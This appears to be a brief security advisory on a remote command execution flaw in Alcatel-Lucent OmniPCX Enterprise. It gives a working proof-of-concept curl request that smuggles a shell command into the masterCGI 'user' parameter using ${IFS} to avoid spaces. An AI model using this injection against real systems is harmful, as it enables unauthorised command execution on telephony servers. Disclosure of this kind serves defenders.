Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability

Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability

An attacker can exploit this issue via a browser.

The following command demonstrates this issue:

curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"